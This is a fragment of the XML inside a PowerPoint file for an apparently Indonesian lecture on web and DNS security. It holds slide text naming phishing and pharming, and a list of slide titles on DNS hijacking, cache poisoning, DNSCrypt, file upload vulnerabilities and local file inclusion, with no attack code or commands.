              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Pharming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Phishing:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21545578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TM02900720[[fn=Integral]]</Template>
  <TotalTime>135</TotalTime>
  <Words>1705</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>119</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 Unicode MS</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Tw Cen MT</vt:lpstr>
      <vt:lpstr>Tw Cen MT Condensed</vt:lpstr>
      <vt:lpstr>Wingdings 3</vt:lpstr>
      <vt:lpstr>Integral</vt:lpstr>
      <vt:lpstr>DNS HJACKING</vt:lpstr>
      <vt:lpstr>Definisi</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How DNS Hijacking Works? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What are the Dangers of DNS Hijacking? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>How to Prevent DNS Hijacking? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>What if you are already a victim of DNS hijacking? </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning</vt:lpstr>
      <vt:lpstr>DNS Cache Spoofing </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DNS Cache Poisoning – Prevention </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>DNSCrypt: Encrypt Data from Computer to DNS </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Upload FIle</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Step 1 </vt:lpstr>
      <vt:lpstr>Step 2 - </vt:lpstr>
      <vt:lpstr>How To Protect Your Website from the FileUpload Vulnerability?</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Local FILE INCLUSION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DNS HJACKING</dc:title>
  <dc:creator>anggi</dc:creator>
  <cp:lastModifiedBy>anggi</cp:lastModifiedBy>
  <cp:revision>16</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-11-25T14:05:33Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-11-26T00:18:08Z</dcterms:modified>
</cp:coreProperties>
</file>